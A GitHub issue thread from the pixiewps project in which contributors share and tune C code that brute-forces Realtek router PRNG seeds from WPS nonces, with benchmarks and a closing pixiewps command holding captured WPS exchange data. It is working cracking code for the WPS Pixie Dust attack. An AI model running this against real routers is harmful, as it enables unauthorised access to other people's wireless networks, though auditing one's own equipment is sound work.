Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Perfomance improvement for the realtek. #88

Closed
1yura opened this issue Jan 9, 2018 · 18 comments
Closed

Perfomance improvement for the realtek. #88

1yura opened this issue Jan 9, 2018 · 18 comments

Comments

@1yura
Copy link

1yura commented Jan 9, 2018

I found the way to improvement perfomance of the realtek prng.

static const uint32_t realtek_fast_table[3 + 31] = {0x128e83b, 0xdafa31, 0x9f4828, 0xf66443, 0xbee24d, 0x817005, 0xcb918f, 0xa64845, 0x69c3cf, 0xa76dbd, 0x90a848, 0x57025f, 0x89126c, 0x7d9a8f, 0x48252a, 0x6fb2d4, 0x6ccc15, 0x3c5744, 0x5a998f, 0x5df917, 0x32ed77, 0x492688, 0x50e901, 0x2b5f57, 0x3acd0b, 0x456b7a, 0x25413d, 0x2f11f4, 0x3b564d, 0x203f14, 0x2589fc, 0x3283f8, 0x1c17e4, 0x1dd823};

static inline void realtek_fast_produce_nonce(uint32_t seed, uint8_t *dest){ // convert seed to nonce, it is completly replaces srandom_r() and random_r() ; seed !=0
	uint32_t word0 = 0, word1 = 0, word2 = 0, word3 = 0;

	for (int j = 0; j < 31; j++) {
		word0 += seed * realtek_fast_table[j + 3];
		word1 += seed * realtek_fast_table[j + 2];
		word2 += seed * realtek_fast_table[j + 1];
		word3 += seed * realtek_fast_table[j + 0];
		seed = (uint32_t) (((uint64_t)16807 * seed) % 2147483647);
	}
	word0 = htonl(word0 >> 1); memcpy(dest + 0,  &word0, 4);
	word0 = htonl(word1 >> 1); memcpy(dest + 4,  &word0, 4);
	word0 = htonl(word2 >> 1); memcpy(dest + 8,  &word0, 4);
	word0 = htonl(word3 >> 1); memcpy(dest + 12, &word0, 4);
}

static uint32_t realtek_fast_prepare_sample(uint8_t *nonce) { // get 1/4 part of the nonce for testing
	uint32_t res;
	memcpy(&res, nonce, sizeof(res));
	return ntohl(res);
}

static inline int realtek_fast_test_seed(uint32_t seed, uint32_t sample){ // testing 1/4 part of the nonce; if matched - there is a need to test a whole nonce; seed !=0
	uint32_t word0 = 0;

	for (int j = 0; j < 31; j++) {
		word0 += seed * realtek_fast_table[j + 3];
		seed = (uint32_t) (((uint64_t)16807 * seed) % 2147483647);
	}
	word0 = word0 >> 1;
	return sample == word0 ? ret_ok : ret_fail;
}

and the example - how to use these functions:

uint32_t sample = realtek_fast_prepare_sample(wps->e_nonce);
int seed_found = 0;
for (uint32_t seed = 1; seed < 0xffffffff; seed++) {
	if (realtek_fast_test_seed(seed, sample) != ret_ok) {
		continue;
	}
	uint8_t test_nonce[WPS_NONCE_LEN];
	realtek_fast_produce_nonce(seed, test_nonce);
	if(memcmp(wps->e_nonce, test_nonce, WPS_NONCE_LEN) == 0) {
		seed_found = 1;
		break;
	}
}

It works 5 more times faster than the chain srandom_r() + random_r(). I do not tested it on big endian CPU.

Edit: added syntax coloring (wiire-a)

@wiire-a
Copy link
Owner

wiire-a commented Jan 9, 2018

Thank you again for your contribution. I will test as soon as I have some spare time :)

The modulo operator is quite slow:

seed = (uint32_t) (((uint64_t)16807 * seed) % 2147483647);

can be substituted with this (should be ~30% faster):

const uint64_t p = 16807ULL * seed;
const uint64_t m = (p >> 31) + (p & 0x7fffffff);
seed = (uint32_t)((m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m);

See glibc_random_lazy.c#L56.

@1yura
Copy link
Author

1yura commented Jan 9, 2018

I did not noticed then you replaced srandom_r ()
:)

@wiire-a
Copy link
Owner

wiire-a commented Jan 9, 2018

Added the new code with (7738fda).

I simplified the code a bit, like removing the htonl() functions and the % 2147483647parts.

On my x86 machine it's about 60% faster, but my commit aimed for a quick and simple integration with the existing code. Some further testing and tweaking could be useful.

@1yura
Copy link
Author

1yura commented Jan 10, 2018

In the cycle
for (int j = 0; j < 31; j++)
last (when j == 30) calculation of seed is useless.

@wiire-a
Copy link
Owner

wiire-a commented Jan 10, 2018

Yes. I think the code could be re-written this way:

static inline uint32_t glibc_fast_seed(uint32_t seed)
{
	uint32_t word0 = 0;

	for (int j = 3; j < 31 + 3 - 1; j++) {
		word0 += seed * glibc_seed_tbl[j];

		/* This does: seed = (16807LL * seed) % 0x7fffffff
		   using the sum of digits method which works for mod N, base N+1 */
		const uint64_t p = 16807ULL * seed; // Seed is always positive (31 bits)
		seed = (p >> 31) + (p & 0x7fffffff);
	}
	return (word0 + seed * glibc_seed_tbl[33]) >> 1;
}

The variable seed is always positive thus the multiplication 16807ULL * seed is 63 bits or less and after the first shift (p >> 31) the top bits of p are always 0. So the second part:

/* The result might still not fit in 31 bits, if not, repeat
    (conditional seems to make it slightly faster) */
seed = (m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m;

is useless.

Maybe you can confirm me that.

BTW if you want come back to the IRC channel we can discuss these things there. I know that @rofl0r can be a bit annoying but bear with him ;)

@wiire-a
Copy link
Owner

wiire-a commented Jan 10, 2018

Pushed the new changes (7acd739). On my laptop now the difference is much more noticeable compared to my old code: 4 times faster.

@1yura
Copy link
Author

1yura commented Jan 10, 2018

seed = (m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m;
is useless.
Maybe you can confirm me that.

Not confirm. For example with seed 5951 glibc_fast_seed() gets wrong result. I don know why. With
seed = (m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m; - all ok.

@1yura
Copy link
Author

1yura commented Jan 10, 2018

A constantly working messenger distracts me. But when there is something to discuss - I will join.
And about - can ralink_random() produce any value or not - it can, i checked :)

@1yura
Copy link
Author

1yura commented Jan 10, 2018

I found something interesting:
seed = 0xfffffffe
function with code
seed = (uint32_t) (((uint64_t)16807 * seed) % 2147483647);
produces correct nonce. But function with

		const uint64_t p = 16807ULL * seed;
		const uint64_t m = (p >> 31) + (p & 0x7fffffff);
		seed = (uint32_t)((m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m);

produces wrong nonce.

@amiinebh
Copy link

just tested this and the difference is noticeable , thank you @1yura for your contribution , just like the ralink optimization , the code now is way more faster , great work @wiire-a @1yura

@1yura
Copy link
Author

1yura commented Jan 10, 2018

Upd.
Try this fast function: https://0x0.st/sNXM.c
The output must be compared with the lower 7 bits of the first word(32 bit) nonce.

@wiire-a
Copy link
Owner

wiire-a commented Jan 11, 2018

Will do soon.

At the time I added the conditional because it seemed to be faster that way. In this function however it seems to make it noticeably slower so I guess we should replace:

const uint64_t p = 16807ULL * seed;
const uint64_t m = (p >> 31) + (p & 0x7fffffff);
seed = (m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m;

with this:

uint64_t p = 16807ULL * seed;
p = (p >> 31) + (p & 0x7fffffff);
seed = (p >> 31) + (p & 0x7fffffff);

In the current code negative values are never tested since the seed corresponds always to the current time, it's always positive. So I wouldn't add the check with:

seed = (seed == 0x7fffffff || seed == 0xfffffffe) ? 0 : seed;

which only slows down the cracking process.

If the current time is not retrieved from the router, the value of 0 (Unix Epoch) is returned. But seed = 0 returns a value of 0. So internally the PRNG checks if seed = 0, if it is it changes it to 1, see glibc_random_old.c#L93:

/* We must make sure the seed is not 0. Take arbitrarily 1 in this case. */
if (seed == 0)
    seed = 1;

The value of 0x7ffffffff would be ok, but it represents 03:14:07 of January 19th 2038 (UTC). In practice it's never tested unless the user uses --end/start 02/2038. But honestly I wouldn't worry about it.

@wiire-a
Copy link
Owner

wiire-a commented Jan 11, 2018

What's the purpose of doing:

REALTEK_FAST_SEED_STEP

over and over again, if the seed doesn't change?

@1yura
Copy link
Author

1yura commented Jan 11, 2018

It updates the seed :)
# define REALTEK_FAST_SEED_STEP p = 16807ULL * seed; m = (p >> 31) + (p & 0x7fffffff); seed = (uint32_t)((m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m);

@wiire-a
Copy link
Owner

wiire-a commented Jan 11, 2018

Old:

       2242.215146      task-clock (msec)         #    3.727 CPUs utilized          
               217      context-switches          #    0.097 K/sec                  
                 3      cpu-migrations            #    0.001 K/sec                  
               140      page-faults               #    0.062 K/sec                  
     5,116,201,317      cycles                    #    2.282 GHz                      (83.45%)
        64,305,319      stalled-cycles-frontend   #    1.26% frontend cycles idle     (83.54%)
     2,728,813,181      stalled-cycles-backend    #   53.34% backend cycles idle      (33.12%)
     8,297,312,960      instructions              #    1.62  insn per cycle         
                                                  #    0.33  stalled cycles per insn  (50.20%)
       556,638,317      branches                  #  248.254 M/sec                    (66.95%)
         4,441,275      branch-misses             #    0.80% of all branches          (83.47%)

       0.601541662 seconds time elapsed

New:

       2267.696976      task-clock (msec)         #    3.741 CPUs utilized          
               227      context-switches          #    0.100 K/sec                  
                 2      cpu-migrations            #    0.001 K/sec                  
               141      page-faults               #    0.062 K/sec                  
     5,179,056,557      cycles                    #    2.284 GHz                      (83.62%)
        17,023,000      stalled-cycles-frontend   #    0.33% frontend cycles idle     (83.18%)
     3,291,806,179      stalled-cycles-backend    #   63.56% backend cycles idle      (33.36%)
     6,936,919,663      instructions              #    1.34  insn per cycle         
                                                  #    0.47  stalled cycles per insn  (51.10%)
        80,430,879      branches                  #   35.468 M/sec                    (67.60%)
           320,102      branch-misses             #    0.40% of all branches          (83.81%)

       0.606194954 seconds time elapsed

It doesn't really change anything for me. Even if you unroll or remove the for loop, the instructions are still executed sequentially since one depends on the other.

For example:

REALTEK_FAST_SEED_STEP
b += realtek_fast_lookup_4d[(uint8_t)seed]; /* This must wait operation above to finish (since seed is shared) */

REALTEK_FAST_SEED_STEP                      /* This must wait operation above to finish (since seed is shared) */
b += realtek_fast_lookup_5[(uint8_t)seed];  /* This must wait operation above to finish (since seed is shared) */

If instead we'd have something like:

for (...) {
    // ...
    independent_operation_A();
    independent_operation_B();
    // ...
}

those 2 would execute in parallel if they wouldn't share the same variables (seed in our case).

Also the most expensive operation is the modulo (%) or its variant in REALTEK_FAST_SEED_STEP, a precomputed table maybe should aim at avoiding or reducing that.

@wiire-a
Copy link
Owner

wiire-a commented Jan 11, 2018

I pushed the changes to fix my previous commit so we have the same starting point to judge optimizations and modifications.

Maybe another consideration that could be useful is the fact that we test the seeds in sequence:

seed
seed + 1
seed + 2
...

or, backwards

seed
seed - 1
seed - 2
...

Not sure if this helps, but if it would we could setup some intermediate table(s), eg: initstate_table(seed).

I'm just throwing out ideas. I'm still not sure I understand what you did with your changes :)

@1yura
Copy link
Author

1yura commented Jan 12, 2018

I have no more ideas.
It should be noted that the conversion of nonce -> seed is always fixed, therefore, those who are important speed can use the lookup tables. The full table is 16GB, the optimized one is 8GB. Or rainbow tables.

@wiire-a
Copy link
Owner

wiire-a commented Jan 12, 2018

We've come a log way. A simple benchmark over a 3 years period (--start 2017 --end 2014) on my laptop:

version -j 1 -j 4 PRNG
1.3.0 108 s 362 ms - old
pre-1.4.0 76 s 534 ms 29 s 818 ms old optimized
1.4.1 27 s 105 ms 9 s 221 ms lazy
git 8 s 909 ms 3 s 109 ms yura

Obviously the difference is less noticeable on a faster machine (e.g. my Desktop).

There will be a new release soon. Thank you :)

Data used:

./pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r 89:90:3d:aa:c7:52:5a:3e:33:c5:b8:33:a3:1d:bf:a5:3c:95:d4:d4:6f:4c:1b:f5:3f:9b:e8:77:47:d8:72:7b:a9:46:85:f6:83:4b:6a:11:d0:6d:1d:5b:5f:af:70:32:02:4e:f9:d7:5c:bb:45:d8:03:eb:b2:ea:5d:c7:b2:a8:05:9d:f3:7e:93:be:97:c4:d6:60:11:cc:fc:9a:d3:21:f3:b9:4b:5b:79:ae:5d:31:66:3d:7c:41:42:31:df:5a:62:64:70:97:ae:7a:7a:57:43:13:71:01:cc:80:df:c0:7d:45:2e:e6:5d:92:8f:22:28:6c:53:f6:4f:5e:f8:aa:bf:21:4b:c6:9e:37:74:86:37:f2:07:6b:26:b9:7a:6f:50:86:6e:2a:80:3a:5a:e4:0f:d3:9e:50:12:4e:86:38:05:38:c6:34:1a:b7:8a:8a:13:f9:19:f9:61:c0:75:b7:2c:9a:1d:21:d5:5c:14:e7:50:94:c8:53:a8:4d:0f:06 -s d1:61:6f:47:df:93:d1:94:80:ec:a1:23:3c:7b:0b:1e:7a:b7:c4:09:a8:b8:20:87:cb:26:89:d4:d5:34:e3:21 -z 11:58:69:bd:7c:9d:3a:8c:18:e9:b1:04:bc:2e:85:a2:39:fb:12:cd:b3:a0:a5:c5:95:88:08:1d:fb:d7:92:a7 -a 77:e6:24:e3:4f:d1:8e:57:48:a2:88:de:ee:88:0e:14:bc:8e:9e:c8:4b:eb:14:ec:9e:8b:cb:d5:d6:6d:79:97 -n 4b:86:6f:2e:76:49:21:ce:56:c2:93:63:3c:b5:a0:b5

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

3 participants